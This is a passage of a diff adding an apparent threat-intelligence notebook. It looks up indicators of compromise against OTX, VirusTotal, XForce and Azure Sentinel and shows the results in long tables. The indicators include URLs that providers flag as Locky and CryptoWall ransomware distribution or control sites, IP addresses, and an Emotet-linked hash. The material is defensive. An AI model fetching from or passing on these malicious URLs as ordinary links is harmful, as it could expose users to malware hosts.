'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'https://google.c...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/https%3A%2F%2Fgoogle.com/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>https://hotel-bristol.lu/dlry/MAnJIPnY/</td>\n      <td>url</td>\n      <td>https%3A%2F%2Fhotel-bristol.lu%2Fdlry%2FMAnJIPnY%2F</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'https://hotel-br...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/https%3A%2F%2Fhotel-bristol.lu%2Fdlry%2FMAnJIPn...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>https://hotel-bristol.lu/dlry/MAnJIPnY/</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:19.058146Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>https://hotel-bristol.lu/dlry/MAnJIPnY/</td>\n      <td>url</td>\n      <td>https://hotel-bristol.lu/dlry/MAnJIPnY/</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'verbose_msg': 'Scan finished, scan information embedded in this object', 'response_code': 1, '...</td>\n      <td>{'scan_id': '7c7632dc2fa393902d378f2593822b98f54f4303ab595bd5e37549258add6140-1595714025', 'reso...</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>https://hotel-bristol.lu/dlry/MAnJIPnY/</td>\n      <td>url</td>\n      <td>https://hotel-bristol.lu/dlry/MAnJIPnY/</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>False</td>\n      <td>information</td>\n      <td>Not found.</td>\n      <td>&lt;Response [404]&gt;</td>\n      <td>https://api.xforce.ibmcloud.com/url/https://hotel-bristol.lu/dlry/MAnJIPnY/</td>\n      <td>404</td>\n    </tr>\n    <tr>\n      <th>9</th>\n      <td>https://microsoft.com</td>\n      <td>url</td>\n      <td>https://microsoft.com</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n      <td>{'result': {'url': 'microsoft.com', 'cats': {'Software / Hardware': True, 'General Business': Tr...</td>\n      <td>https://api.xforce.ibmcloud.com/url/https://microsoft.com</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>9</th>\n      <td>https://microsoft.com</td>\n      <td>url</td>\n      <td>https%3A%2F%2Fmicrosoft.com</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'https://microsof...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/https%3A%2F%2Fmicrosoft.com/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>9</th>\n      <td>https://microsoft.com</td>\n      <td>url</td>\n      <td>https://microsoft.com</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>5</th>\n      <td>https://microsoft.com</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:19.058146Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>10</th>\n      <td>https://python.org</td>\n      <td>url</td>\n      <td>https://python.org</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>10</th>\n      <td>https://python.org</td>\n      <td>url</td>\n      <td>https%3A%2F%2Fpython.org</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'https://python.o...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/https%3A%2F%2Fpython.org/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>10</th>\n      <td>https://python.org</td>\n      <td>url</td>\n      <td>https://python.org</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n      <td>{'result': {'url': 'python.org', 'cats': {'Software / Hardware': True}, 'score': 1, 'application...</td>\n      <td>https://api.xforce.ibmcloud.com/url/https://python.org</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>10</th>\n      <td>https://python.org</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:19.058146Z) | w...</td>\n      <td>0</td>\n    </tr>\n  </tbody>\n</table>\n</div>",
+      "text/plain": "                                         Ioc IocType  \\\n9             http://104.248.196.145/apache2     url   \n5             http://104.248.196.145/apache2     url   \n5             http://104.248.196.145/apache2     url   \n5             http://104.248.196.145/apache2     url   \n6            http://ajaraheritage.ge/g7cberv     url   \n6            http://ajaraheritage.ge/g7cberv     url   \n8            http://ajaraheritage.ge/g7cberv     url   \n6            http://ajaraheritage.ge/g7cberv     url   \n4                   http://append.pl/srh9xsz     url   \n4                   http://append.pl/srh9xsz     url   \n4                   http://append.pl/srh9xsz     url   \n0                   http://append.pl/srh9xsz     url   \n3                   http://businesstobuy.net     url   \n3                   http://businesstobuy.net     url   \n3                   http://businesstobuy.net     url   \n2                   http://businesstobuy.net     url   \n7           http://cheapshirts.us/zVnMrG.php     url   \n0           http://cheapshirts.us/zVnMrG.php     url   \n0           http://cheapshirts.us/zVnMrG.php     url   \n0           http://cheapshirts.us/zVnMrG.php     url   \n1            http://chinasymbolic.com/i9jnrc     url   \n6            http://chinasymbolic.com/i9jnrc     url   \n1            http://chinasymbolic.com/i9jnrc     url   \n1            http://chinasymbolic.com/i9jnrc     url   \n7   http://cic-integration.com/hjy93JNBasdas     url   \n3   http://cic-integration.com/hjy93JNBasdas     url   \n7   http://cic-integration.com/hjy93JNBasdas     url   \n7   http://cic-integration.com/hjy93JNBasdas     url   \n8                         https://google.com     url   \n4                         https://google.com     url   \n8                         https://google.com     url   \n8                         https://google.com     url   \n2    https://hotel-bristol.lu/dlry/MAnJIPnY/     url   \n1    https://hotel-bristol.lu/dlry/MAnJIPnY/     url   \n2    https://hotel-bristol.lu/dlry/MAnJIPnY/     url   \n2    https://hotel-bristol.lu/dlry/MAnJIPnY/     url   \n9                      https://microsoft.com     url   \n9                      https://microsoft.com     url   \n9                      https://microsoft.com     url   \n5                      https://microsoft.com     url   \n10                        https://python.org     url   \n10                        https://python.org     url   \n10                        https://python.org     url   \n10                        https://python.org     url   \n\n                                                SafeIoc QuerySubtype  \\\n9                                                   NaN         None   \n5                        http://104.248.196.145/apache2         None   \n5                        http://104.248.196.145/apache2         None   \n5                http%3A%2F%2F104.248.196.145%2Fapache2         None   \n6                       http://ajaraheritage.ge/g7cberv         None   \n6                       http://ajaraheritage.ge/g7cberv         None   \n8                                                   NaN         None   \n6               http%3A%2F%2Fajaraheritage.ge%2Fg7cberv         None   \n4                      http%3A%2F%2Fappend.pl%2Fsrh9xsz         None   \n4                              http://append.pl/srh9xsz         None   \n4                              http://append.pl/srh9xsz         None   \n0                                                   NaN         None   \n3                        http%3A%2F%2Fbusinesstobuy.net         None   \n3                              http://businesstobuy.net         None   \n3                              http://businesstobuy.net         None   \n2                                                   NaN         None   \n7                                                   NaN         None   \n0                      http://cheapshirts.us/zVnMrG.php         None   \n0                      http://cheapshirts.us/zVnMrG.php         None   \n0              http%3A%2F%2Fcheapshirts.us%2FzVnMrG.php         None   \n1                       http://chinasymbolic.com/i9jnrc         None   \n6                                                   NaN         None   \n1                       http://chinasymbolic.com/i9jnrc         None   \n1               http%3A%2F%2Fchinasymbolic.com%2Fi9jnrc         None   \n7              http://cic-integration.com/hjy93JNBasdas         None   \n3                                                   NaN         None   \n7      http%3A%2F%2Fcic-integration.com%2Fhjy93JNBasdas         None   \n7              http://cic-integration.com/hjy93JNBasdas         None   \n8                                    https://google.com         None   \n4                                                   NaN         None   \n8                                    https://google.com         None   \n8                              https%3A%2F%2Fgoogle.com         None   \n2   https%3A%2F%2Fhotel-bristol.lu%2Fdlry%2FMAnJIPnY%2F         None   \n1                                                   NaN         None   \n2               https://hotel-bristol.lu/dlry/MAnJIPnY/         None   \n2               https://hotel-bristol.lu/dlry/MAnJIPnY/         None   \n9                                 https://microsoft.com         None   \n9                           https%3A%2F%2Fmicrosoft.com         None   \n9                                 https://microsoft.com         None   \n5                                                   NaN         None   \n10                                   https://python.org         None   \n10                             https%3A%2F%2Fpython.org         None   \n10                                   https://python.org         None   \n10                                                  NaN         None   \n\n      Provider  Result     Severity  \\\n9        AzSTI   False            0   \n5   VirusTotal   False  information   \n5       XForce   False  information   \n5          OTX    True  information   \n6   VirusTotal   False  information   \n6       XForce    True  information   \n8        AzSTI   False            0   \n6          OTX    True         high   \n4          OTX    True      warning   \n4       XForce    True  information   \n4   VirusTotal   False  information   \n0        AzSTI   False            0   \n3          OTX    True  information   \n3       XForce    True  information   \n3   VirusTotal    True         high   \n2        AzSTI   False            0   \n7        AzSTI   False            0   \n0       XForce    True  information   \n0   VirusTotal    True         high   \n0          OTX    True         high   \n1       XForce    True  information   \n6        AzSTI   False            0   \n1   VirusTotal    True         high   \n1          OTX    True         high   \n7   VirusTotal   False  information   \n3        AzSTI   False            0   \n7          OTX    True      warning   \n7       XForce    True  information   \n8       XForce    True  information   \n4        AzSTI   False            0   \n8   VirusTotal   False  information   \n8          OTX    True  information   \n2          OTX    True  information   \n1        AzSTI   False            0   \n2   VirusTotal    True         high   \n2       XForce   False  information   \n9       XForce    True  information   \n9          OTX    True  information   \n9   VirusTotal   False  information   \n5        AzSTI   False            0   \n10  VirusTotal   False  information   \n10         OTX    True  information   \n10      XForce    True  information   \n10       AzSTI   False            0   \n\n                                                                                                Details  \\\n9                                                                                            Not found.   \n5                                                                                            No Content   \n5                                                                                            Not found.   \n5         {'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}   \n6                                                                                            No Content   \n6   {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n8                                                                                            Not found.   \n6   {'pulse_count': 2, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)', ...   \n4   {'pulse_count': 1, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)'],...   \n4   {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n4                                                                                            No Content   \n0                                                                                            Not found.   \n3         {'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}   \n3   {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n3   {'verbose_msg': 'Scan finished, scan information embedded in this object', 'response_code': 1, '...   \n2                                                                                            Not found.   \n7                                                                                            Not found.   \n0   {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n0   {'verbose_msg': 'Scan finished, scan information embedded in this object', 'response_code': 1, '...   \n0   {'pulse_count': 7, 'names': ['CryptoWall Ransomware C2 URL blocklist (CW_C2_URLBL)', 'CryptoWall...   \n1   {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n6                                                                                            Not found.   \n1   {'verbose_msg': 'Scan finished, scan information embedded in this object', 'response_code': 1, '...   \n1   {'pulse_count': 2, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)', ...   \n7                                                                                            No Content   \n3                                                                                            Not found.   \n7   {'pulse_count': 1, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)'],...   \n7   {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n8   {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n4                                                                                            Not found.   \n8                                                                                            No Content   \n8         {'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}   \n2         {'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}   \n1                                                                                            Not found.   \n2   {'verbose_msg': 'Scan finished, scan information embedded in this object', 'response_code': 1, '...   \n2                                                                                            Not found.   \n9   {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n9         {'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}   \n9                                                                                            No Content   \n5                                                                                            Not found.   \n10                                                                                           No Content   \n10        {'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}   \n10  {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n10                                                                                           Not found.   \n\n                                                                                              RawResult  \\\n9                                                                                                   NaN   \n5                                                                                      <Response [204]>   \n5                                                                                      <Response [404]>   \n5   {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://104.248.1...   \n6                                                                                      <Response [204]>   \n6   {'result': {'url': 'ajaraheritage.ge', 'cats': {}, 'score': None, 'categoryDescriptions': {}}, '...   \n8                                                                                                   NaN   \n6   {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://ajaraheri...   \n4   {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://append.pl...   \n4   {'result': {'url': 'append.pl', 'cats': {'Software / Hardware': True}, 'score': 1, 'categoryDesc...   \n4                                                                                      <Response [204]>   \n0                                                                                                   NaN   \n3   {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://businesst...   \n3   {'result': {'url': 'businesstobuy.net', 'cats': {'Phishing URLs': True}, 'score': 10, 'categoryD...   \n3   {'scan_id': 'af9e75c955b06e2baf7c41de10afd2beb0f5ab53d5958690e2ee1ce30c6465cb-1608964829', 'reso...   \n2                                                                                                   NaN   \n7                                                                                                   NaN   \n0   {'result': {'url': 'cheapshirts.us', 'cats': {'Shopping': True, 'Auctions / Classified Ads': Tru...   \n0   {'scan_id': '154798b4220dfcc1d668b3a9fdcec6b384076db9e8be7d18d0747c327d5fca21-1575775323', 'reso...   \n0   {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://cheapshir...   \n1   {'result': {'url': 'chinasymbolic.com', 'cats': {}, 'score': None, 'categoryDescriptions': {}}, ...   \n6                                                                                                   NaN   \n1   {'scan_id': 'e56703fb78dcdd3229f2dad44779315924172b3a9815d137a8dbfbe27637e17b-1618935331', 'reso...   \n1   {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://chinasymb...   \n7                                                                                      <Response [204]>   \n3                                                                                                   NaN   \n7   {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://cic-integ...   \n7   {'result': {'url': 'cic-integration.com', 'cats': {}, 'score': None, 'categoryDescriptions': {}}...   \n8   {'result': {'url': 'https://google.com', 'cats': {'Search Engines / Web Catalogues / Portals': T...   \n4                                                                                                   NaN   \n8                                                                                      <Response [204]>   \n8   {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'https://google.c...   \n2   {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'https://hotel-br...   \n1                                                                                                   NaN   \n2   {'scan_id': '7c7632dc2fa393902d378f2593822b98f54f4303ab595bd5e37549258add6140-1595714025', 'reso...   \n2                                                                                      <Response [404]>   \n9   {'result': {'url': 'microsoft.com', 'cats': {'Software / Hardware': True, 'General Business': Tr...   \n9   {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'https://microsof...   \n9                                                                                      <Response [204]>   \n5                                                                                                   NaN   \n10                                                                                     <Response [204]>   \n10  {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'https://python.o...   \n10  {'result': {'url': 'python.org', 'cats': {'Software / Hardware': True}, 'score': 1, 'application...   \n10                                                                                                  NaN   \n\n                                                                                              Reference  \\\n9    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:19.058146Z) | w...   \n5                                                        https://www.virustotal.com/vtapi/v2/url/report   \n5                                    https://api.xforce.ibmcloud.com/url/http://104.248.196.145/apache2   \n5       https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2F104.248.196.145%2Fapache2/general   \n6                                                        https://www.virustotal.com/vtapi/v2/url/report   \n6                                   https://api.xforce.ibmcloud.com/url/http://ajaraheritage.ge/g7cberv   \n8    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:19.058146Z) | w...   \n6      https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fajaraheritage.ge%2Fg7cberv/general   \n4             https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fappend.pl%2Fsrh9xsz/general   \n4                                          https://api.xforce.ibmcloud.com/url/http://append.pl/srh9xsz   \n4                                                        https://www.virustotal.com/vtapi/v2/url/report   \n0    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:19.058146Z) | w...   \n3               https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fbusinesstobuy.net/general   \n3                                          https://api.xforce.ibmcloud.com/url/http://businesstobuy.net   \n3                                                        https://www.virustotal.com/vtapi/v2/url/report   \n2    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:19.058146Z) | w...   \n7    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:19.058146Z) | w...   \n0                                  https://api.xforce.ibmcloud.com/url/http://cheapshirts.us/zVnMrG.php   \n0                                                        https://www.virustotal.com/vtapi/v2/url/report   \n0     https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fcheapshirts.us%2FzVnMrG.php/general   \n1                                   https://api.xforce.ibmcloud.com/url/http://chinasymbolic.com/i9jnrc   \n6    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:19.058146Z) | w...   \n1                                                        https://www.virustotal.com/vtapi/v2/url/report   \n1      https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fchinasymbolic.com%2Fi9jnrc/general   \n7                                                        https://www.virustotal.com/vtapi/v2/url/report   \n3    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:19.058146Z) | w...   \n7   https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fcic-integration.com%2Fhjy93JNBasda...   \n7                          https://api.xforce.ibmcloud.com/url/http://cic-integration.com/hjy93JNBasdas   \n8                                                https://api.xforce.ibmcloud.com/url/https://google.com   \n4    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:19.058146Z) | w...   \n8                                                        https://www.virustotal.com/vtapi/v2/url/report   \n8                     https://otx.alienvault.com/api/v1/indicators/url/https%3A%2F%2Fgoogle.com/general   \n2   https://otx.alienvault.com/api/v1/indicators/url/https%3A%2F%2Fhotel-bristol.lu%2Fdlry%2FMAnJIPn...   \n1    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:19.058146Z) | w...   \n2                                                        https://www.virustotal.com/vtapi/v2/url/report   \n2                           https://api.xforce.ibmcloud.com/url/https://hotel-bristol.lu/dlry/MAnJIPnY/   \n9                                             https://api.xforce.ibmcloud.com/url/https://microsoft.com   \n9                  https://otx.alienvault.com/api/v1/indicators/url/https%3A%2F%2Fmicrosoft.com/general   \n9                                                        https://www.virustotal.com/vtapi/v2/url/report   \n5    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:19.058146Z) | w...   \n10                                                       https://www.virustotal.com/vtapi/v2/url/report   \n10                    https://otx.alienvault.com/api/v1/indicators/url/https%3A%2F%2Fpython.org/general   \n10                                               https://api.xforce.ibmcloud.com/url/https://python.org   \n10   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:19.058146Z) | w...   \n\n    Status  \n9        0  \n5      204  \n5      404  \n5        0  \n6      204  \n6        0  \n8        0  \n6        0  \n4        0  \n4        0  \n4      204  \n0        0  \n3        0  \n3        0  \n3        0  \n2        0  \n7        0  \n0        0  \n0        0  \n0        0  \n1        0  \n6        0  \n1        0  \n1        0  \n7      204  \n3        0  \n7        0  \n7        0  \n8        0  \n4        0  \n8      204  \n8        0  \n2        0  \n1        0  \n2        0  \n2      404  \n9        0  \n9        0  \n9      204  \n5        0  \n10     204  \n10       0  \n10       0  \n10       0  "
+     },
+     "execution_count": 19,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "ioc_urls = [\n",
+    "    \"http://cheapshirts.us/zVnMrG.php\",\n",
+    "    \"http://chinasymbolic.com/i9jnrc\",\n",
+    "    \"https://hotel-bristol.lu/dlry/MAnJIPnY/\",\n",
+    "    \"http://businesstobuy.net\",\n",
+    "    \"http://append.pl/srh9xsz\",\n",
+    "    \"http://104.248.196.145/apache2\",\n",
+    "    \"http://ajaraheritage.ge/g7cberv\",\n",
+    "    \"http://cic-integration.com/hjy93JNBasdas\",\n",
+    "    \"https://google.com\",  # benign\n",
+    "    \"https://microsoft.com\",  # benign\n",
+    "    \"https://python.org\",  # benign\n",
+    "]\n",
+    "results = ti_lookup.lookup_iocs(data=ioc_urls)\n",
+    "results.sort_values(\"Ioc\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Multiple Mixed IoC Types"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:34.221945Z",
+     "start_time": "2019-09-25T04:58:17.055505Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>Ioc</th>\n      <th>IocType</th>\n      <th>SafeIoc</th>\n      <th>QuerySubtype</th>\n      <th>Provider</th>\n      <th>Result</th>\n      <th>Severity</th>\n      <th>Details</th>\n      <th>RawResult</th>\n      <th>Reference</th>\n      <th>Status</th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>0</th>\n      <td>http://104.248.196.145/apache2</td>\n      <td>url</td>\n      <td>http%3A%2F%2F104.248.196.145%2Fapache2</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://104.248.1...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2F104.248.196.145%2Fapache2/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>http://ajaraheritage.ge/g7cberv</td>\n      <td>url</td>\n      <td>http%3A%2F%2Fajaraheritage.ge%2Fg7cberv</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'pulse_count': 2, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)', ...</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://ajaraheri...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fajaraheritage.ge%2Fg7cberv/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>http://cic-integration.com/hjy93JNBasdas</td>\n      <td>url</td>\n      <td>http%3A%2F%2Fcic-integration.com%2Fhjy93JNBasdas</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>warning</td>\n      <td>{'pulse_count': 1, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)'],...</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://cic-integ...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fcic-integration.com%2Fhjy93JNBasda...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>51.75.29.61</td>\n      <td>ipv4</td>\n      <td>51.75.29.61</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'pulse_count': 50, 'names': ['IOCs - 202135947 - ANIA Threat Feeds - IP Segment 0', 'IOCs - 202...</td>\n      <td>{'whois': 'http://whois.domaintools.com/51.75.29.61', 'reputation': 0, 'indicator': '51.75.29.61...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/IPv4/51.75.29.61/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>33.44.55.66</td>\n      <td>ipv4</td>\n      <td>33.44.55.66</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'pulse_count': 0, 'sections_available': ['general', 'geo', 'reputation', 'url_list', 'passive_d...</td>\n      <td>{'whois': 'http://whois.domaintools.com/33.44.55.66', 'reputation': 0, 'indicator': '33.44.55.66...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/IPv4/33.44.55.66/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>5</th>\n      <td>52.183.120.194</td>\n      <td>ipv4</td>\n      <td>52.183.120.194</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'pulse_count': 0, 'sections_available': ['general', 'geo', 'reputation', 'url_list', 'passive_d...</td>\n      <td>{'whois': 'http://whois.domaintools.com/52.183.120.194', 'reputation': 0, 'indicator': '52.183.1...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/IPv4/52.183.120.194/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>6</th>\n      <td>f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092</td>\n      <td>sha256_hash</td>\n      <td>f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'pulse_count': 3, 'names': ['Emotet IOCs 2/4/2019', 'Emotet IOCs 2/1/2019', 'Emotet IOCs 1/31/2...</td>\n      <td>{'sections': ['general', 'analysis'], 'type': 'sha256', 'type_title': 'FileHash-SHA256', 'indica...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/file/f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>7</th>\n      <td>cc2db822f652ca67038ba7cca8a8bde3</td>\n      <td>md5_hash</td>\n      <td>cc2db822f652ca67038ba7cca8a8bde3</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'pulse_count': 0, 'sections_available': ['general', 'analysis']}</td>\n      <td>{'sections': ['general', 'analysis'], 'type': 'md5', 'type_title': 'FileHash-MD5', 'indicator': ...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/file/cc2db822f652ca67038ba7cca8a8bde3/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>8</th>\n      <td>ajaraheritage.ge</td>\n      <td>dns</td>\n      <td>ajaraheritage.ge</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'pulse_count': 27, 'names': ['Veronica.muratori ', 'Veronica.muratori ', 'https://instagram.com...</td>\n      <td>{'sections': ['general', 'geo', 'url_list', 'passive_dns', 'malware', 'whois', 'http_scans'], 'w...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/domain/ajaraheritage.ge/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>0</th>\n      <td>http://104.248.196.145/apache2</td>\n      <td>url</td>\n      